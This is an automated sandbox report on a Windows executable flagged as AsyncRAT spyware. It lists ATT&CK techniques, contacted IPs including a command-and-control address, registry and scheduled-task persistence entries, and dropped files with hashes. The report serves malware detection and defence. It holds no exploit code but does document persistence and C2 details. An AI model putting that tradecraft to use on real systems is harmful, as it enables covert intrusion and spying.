                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SystemUser32.exe, type: DROPPED

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                            Windows Management Instrumentation                            		1
                            DLL Side-Loading                            		1
                            DLL Side-Loading                            		11
                            Disable or Modify Tools                            		1
                            Input Capture                            		1
                            File and Directory Discovery                            		Remote Services11
                            Archive Collected Data                            		1
                            Ingress Tool Transfer                            		Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault Accounts2
                            Scheduled Task/Job                            		2
                            Scheduled Task/Job                            		11
                            Process Injection                            		1
                            Deobfuscate/Decode Files or Information                            		LSASS Memory23
                            System Information Discovery                            		Remote Desktop Protocol1
                            Input Capture                            		1
                            Encrypted Channel                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain Accounts1
                            PowerShell                            		21
                            Registry Run Keys / Startup Folder                            		2
                            Scheduled Task/Job                            		11
                            Obfuscated Files or Information                            		Security Account Manager541
                            Security Software Discovery                            		SMB/Windows Admin SharesData from Network Shared Drive1
                            Non-Standard Port                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                            Registry Run Keys / Startup Folder                            		2
                            Software Packing                            		NTDS1
                            Process Discovery                            		Distributed Component Object ModelInput Capture2
                            Non-Application Layer Protocol                            		Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                            DLL Side-Loading                            		LSA Secrets151
                            Virtualization/Sandbox Evasion                            		SSHKeylogging12
                            Application Layer Protocol                            		Scheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                            Masquerading                            		Cached Domain Credentials1
                            Application Window Discovery                            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items151
                            Virtualization/Sandbox Evasion                            		DCSync1
                            System Network Configuration Discovery                            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                            Process Injection                            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1530274 Sample: 5q4X9fRo4b.exe Startdate: 09/10/2024 Architecture: WINDOWS Score: 100 40 ip-api.com 2->40 46 Suricata IDS alerts for network traffic 2->46 48 Found malware configuration 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 15 other signatures 2->52 8 5q4X9fRo4b.exe 15 6 2->8         started        13 SystemUser32.exe 2->13         started        15 SystemUser32.exe 2->15         started        17 2 other processes 2->17 signatures3 process4 dnsIp5 42 ip-api.com 208.95.112.1, 49699, 80 TUT-ASUS United States 8->42 44 147.185.221.17, 10406, 49933 SALSGIVERUS United States 8->44 38 C:\Users\user\AppData\...\SystemUser32.exe, PE32 8->38 dropped 56 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->56 58 Protects its processes via BreakOnTermination flag 8->58 60 Bypasses PowerShell execution policy 8->60 68 4 other signatures 8->68 19 powershell.exe 23 8->19         started        22 powershell.exe 23 8->22         started        24 powershell.exe 23 8->24         started        26 2 other processes 8->26 62 Antivirus detection for dropped file 13->62 64 Multi AV Scanner detection for dropped file 13->64 66 Machine Learning detection for dropped file 13->66 file6 signatures7 process8 signatures9 54 Loading BitLocker PowerShell Module 19->54 28 conhost.exe 19->28         started        30 conhost.exe 22->30         started        32 conhost.exe 24->32         started        34 conhost.exe 26->34         started        36 conhost.exe 26->36         started        process10

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            5q4X9fRo4b.exe84%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                            5q4X9fRo4b.exe100%AviraTR/Spy.Gen
                            5q4X9fRo4b.exe100%Joe Sandbox ML

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\Users\user\AppData\Roaming\SystemUser32.exe100%AviraTR/Spy.Gen
                            C:\Users\user\AppData\Roaming\SystemUser32.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Roaming\SystemUser32.exe84%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT

                            Unpacked PE Files

                            No Antivirus matches

                            Domains

                            No Antivirus matches

                            URLs

                            SourceDetectionScannerLabelLink
                            http://nuget.org/NuGet.exe0%URL Reputationsafe
                            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                            http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                            http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                            https://contoso.com/0%URL Reputationsafe
                            https://nuget.org/nuget.exe0%URL Reputationsafe
                            https://contoso.com/License0%URL Reputationsafe
                            https://contoso.com/Icon0%URL Reputationsafe
                            https://aka.ms/pscore680%URL Reputationsafe
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                            http://ip-api.com/line/?fields=hosting0%URL Reputationsafe

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            ip-api.com
                            		208.95.112.1
                            		truetrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              147.185.221.17true
                                		unknown
                                http://ip-api.com/line/?fields=hostingfalse
                                • URL Reputation: safe
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.1333269390.000001C8ED9C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1422781549.0000022BA8EF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1565537713.0000024CB0050000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1748255639.000001C93E16E000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://crl.mQopowershell.exe, 0000000C.00000002.1436589079.0000022BB15AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://wwoft.com/pki/certpowershell.exe, 0000000C.00000002.1436589079.0000022BB15AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://schemas.mic5dpowershell.exe, 00000008.00000002.1340691881.000001C8F5FF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000011.00000002.1626793015.000001C92E329000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://go.microsoft.copowershell.exe, 0000000F.00000002.1578558760.0000024CB8384000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000008.00000002.1318985953.000001C8DDB79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1371602154.0000022B990A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1471528243.0000024CA020A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1626793015.000001C92E329000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000011.00000002.1626793015.000001C92E329000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000008.00000002.1318985953.000001C8DDB79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1371602154.0000022B990A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1471528243.0000024CA020A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1626793015.000001C92E329000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://contoso.com/powershell.exe, 00000011.00000002.1748255639.000001C93E16E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.1333269390.000001C8ED9C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1422781549.0000022BA8EF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1565537713.0000024CB0050000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1748255639.000001C93E16E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://contoso.com/Licensepowershell.exe, 00000011.00000002.1748255639.000001C93E16E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://contoso.com/Iconpowershell.exe, 00000011.00000002.1748255639.000001C93E16E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.microsoft.coUpowershell.exe, 00000008.00000002.1341620056.000001C8F619F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://aka.ms/pscore68powershell.exe, 00000008.00000002.1318985953.000001C8DD951000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1371602154.0000022B98E81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1471528243.0000024C9FFE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1626793015.000001C92E101000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name5q4X9fRo4b.exe, 00000000.00000002.2502473225.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1318985953.000001C8DD951000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1371602154.0000022B98E81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1471528243.0000024C9FFE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1626793015.000001C92E101000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://github.com/Pester/Pesterpowershell.exe, 00000011.00000002.1626793015.000001C92E329000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              208.95.112.1
                                              		ip-api.comUnited States
                                              		53334TUT-ASUStrue
                                              147.185.221.17
                                              		unknownUnited States
                                              		12087SALSGIVERUStrue

                                              General Information

                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1530274
                                              Start date and time:2024-10-09 23:03:09 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 6m 28s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:29
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:5q4X9fRo4b.exe
                                              renamed because original name is a hash value
                                              Original Sample Name:af9ce09585744c97e4c856c8e6124d8a842714dfd5101e27eaff721220679802.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@20/21@1/2
                                              EGA Information:
                                              • Successful, ratio: 11.1%
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 92
                                              • Number of non-executed functions: 11
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe

                                              Warnings

                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target SystemUser32.exe, PID 1316 because it is empty
                                              • Execution Graph export aborted for target SystemUser32.exe, PID 1916 because it is empty
                                              • Execution Graph export aborted for target SystemUser32.exe, PID 3020 because it is empty
                                              • Execution Graph export aborted for target SystemUser32.exe, PID 8164 because it is empty
                                              • Execution Graph export aborted for target powershell.exe, PID 6408 because it is empty
                                              • Execution Graph export aborted for target powershell.exe, PID 7364 because it is empty
                                              • Execution Graph export aborted for target powershell.exe, PID 7652 because it is empty
                                              • Execution Graph export aborted for target powershell.exe, PID 7880 because it is empty
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtCreateKey calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                              • VT rate limit hit for: 5q4X9fRo4b.exe

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              00:42:43Task SchedulerRun new task: SystemUser32 path: C:\Users\user\AppData\Roaming\SystemUser32.exe
                                              00:42:47AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SystemUser32 C:\Users\user\AppData\Roaming\SystemUser32.exe
                                              00:42:55AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SystemUser32 C:\Users\user\AppData\Roaming\SystemUser32.exe
                                              00:43:04AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemUser32.lnk
                                              17:04:08API Interceptor52x Sleep call for process: powershell.exe modified
                                              18:42:43API Interceptor487300x Sleep call for process: 5q4X9fRo4b.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              208.95.112.11yvSMiC8Jt.exeGet hashmaliciousXWormBrowse
                                              • ip-api.com/line/?fields=hosting
                                              WCA-Cooperative-Agreement.docx.exeGet hashmaliciousBabadeda, Exela Stealer, Python Stealer, Waltuhium GrabberBrowse
                                              • ip-api.com/json
                                              a3bZQko7Vi.exeGet hashmaliciousAgentTeslaBrowse
                                              • ip-api.com/line/?fields=hosting
                                              Wt7zcwGIYK.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • ip-api.com/line/?fields=hosting
                                              FUFhVN38a7.exeGet hashmaliciousAgentTeslaBrowse
                                              • ip-api.com/line/?fields=hosting
                                              s6wkPrgsjG.exeGet hashmaliciousAgentTeslaBrowse
                                              • ip-api.com/line/?fields=hosting
                                              78nah2nPON.exeGet hashmaliciousAgentTeslaBrowse
                                              • ip-api.com/line/?fields=hosting
                                              DxsHvFEbpk.exeGet hashmaliciousAgentTeslaBrowse
                                              • ip-api.com/line/?fields=hosting
                                              Ref_50102_607UU.exeGet hashmaliciousAgentTeslaBrowse
                                              • ip-api.com/line/?fields=hosting
                                              Lv8JkokoUa.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                              • ip-api.com/line/?fields=hosting

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              ip-api.com1yvSMiC8Jt.exeGet hashmaliciousXWormBrowse
                                              • 208.95.112.1
                                              WCA-Cooperative-Agreement.docx.exeGet hashmaliciousBabadeda, Exela Stealer, Python Stealer, Waltuhium GrabberBrowse
                                              • 208.95.112.1
                                              a3bZQko7Vi.exeGet hashmaliciousAgentTeslaBrowse
                                              • 208.95.112.1
                                              Wt7zcwGIYK.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 208.95.112.1
                                              FUFhVN38a7.exeGet hashmaliciousAgentTeslaBrowse
                                              • 208.95.112.1
                                              s6wkPrgsjG.exeGet hashmaliciousAgentTeslaBrowse
                                              • 208.95.112.1
                                              78nah2nPON.exeGet hashmaliciousAgentTeslaBrowse
                                              • 208.95.112.1
                                              DxsHvFEbpk.exeGet hashmaliciousAgentTeslaBrowse
                                              • 208.95.112.1
                                              Ref_50102_607UU.exeGet hashmaliciousAgentTeslaBrowse
                                              • 208.95.112.1
                                              Lv8JkokoUa.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                              • 208.95.112.1

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              SALSGIVERUSl18t80u9zg.exeGet hashmaliciousXWormBrowse
                                              • 147.185.221.22
                                              Windows Defender.exeGet hashmaliciousXWormBrowse
                                              • 147.185.221.22
                                              x2Yi9Hr77a.exeGet hashmaliciousXWormBrowse
                                              • 147.185.221.23
                                              e7WMhx18XN.exeGet hashmaliciousSilentXMRMiner, XmrigBrowse
                                              • 147.185.221.22
                                              SecuriteInfo.com.Trojan.MulDrop28.25270.15094.4444.exeGet hashmaliciousNjratBrowse
                                              • 147.185.221.22
                                              1c8DbXc5r0.exeGet hashmaliciousXWormBrowse
                                              • 147.185.221.18
                                              PixpFUv4G7.exeGet hashmaliciousQuasar, XWormBrowse
                                              • 147.185.221.21
                                              H2f8SkAvdV.exeGet hashmaliciousBlank Grabber, XWormBrowse
                                              • 147.185.221.23
                                              A39tzaySzX.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                              • 147.185.221.23
                                              Bpz46JayQ4.exeGet hashmaliciousXWormBrowse
                                              • 147.185.221.22
                                              TUT-ASUS1yvSMiC8Jt.exeGet hashmaliciousXWormBrowse
                                              • 208.95.112.1
                                              WCA-Cooperative-Agreement.docx.exeGet hashmaliciousBabadeda, Exela Stealer, Python Stealer, Waltuhium GrabberBrowse
                                              • 208.95.112.1
                                              a3bZQko7Vi.exeGet hashmaliciousAgentTeslaBrowse
                                              • 208.95.112.1
                                              Wt7zcwGIYK.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 208.95.112.1
                                              FUFhVN38a7.exeGet hashmaliciousAgentTeslaBrowse
                                              • 208.95.112.1
                                              s6wkPrgsjG.exeGet hashmaliciousAgentTeslaBrowse
                                              • 208.95.112.1
                                              78nah2nPON.exeGet hashmaliciousAgentTeslaBrowse
                                              • 208.95.112.1
                                              DxsHvFEbpk.exeGet hashmaliciousAgentTeslaBrowse
                                              • 208.95.112.1
                                              Ref_50102_607UU.exeGet hashmaliciousAgentTeslaBrowse
                                              • 208.95.112.1
                                              Lv8JkokoUa.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                              • 208.95.112.1

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SystemUser32.exe.log

                                              Download File
                                              Process:C:\Users\user\AppData\Roaming\SystemUser32.exe
                                              File Type:CSV text
                                              Category:dropped
                                              Size (bytes):654
                                              Entropy (8bit):5.380476433908377
                                              Encrypted:false
                                              SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                              MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                              SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                              SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                              SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                              Malicious:false
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:modified
                                              Size (bytes):64
                                              Entropy (8bit):0.34726597513537405
                                              Encrypted:false
                                              SSDEEP:3:Nlll:Nll
                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                              Malicious:false
                                              Preview:@...e...........................................................

                                              C:\Users\user\AppData\Local\Temp\Log.tmp

                                              Download File
                                              Process:C:\Users\user\Desktop\5q4X9fRo4b.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):41
                                              Entropy (8bit):3.7195394315431693
                                              Encrypted:false
                                              SSDEEP:3:rRSFYJKXzovNsr4rNrn:EFYJKDoWrcBn
                                              MD5:0DB526D48DAB0E640663E4DC0EFE82BA
                                              SHA1:17AC435DAFEA6FF9F4D6F83FA6C54F9800F43724
                                              SHA-256:934290A76F9E1804069D8ED6515B14101D9D8ABA2EACBF5B260F59941C65340E
                                              SHA-512:FACD013E1B5B8163214CA8C3A18ADEEC3541153CD69240EEFA76DDD54809186E919C1D635AEA648A8641DE7C3216BEC11C41F04719B60F07EDFDC01FF79027B9
                                              Malicious:false
                                              Preview:....### explorer ###..[WIN]r[WIN]r[WIN]r

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0sbhsxc1.yjd.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2gj23jsp.4y4.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dieiz5xk.3cz.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gnyitxex.tqu.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hs1r3ikh.al3.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j5jti112.tg1.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jqsiutxp.eci.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
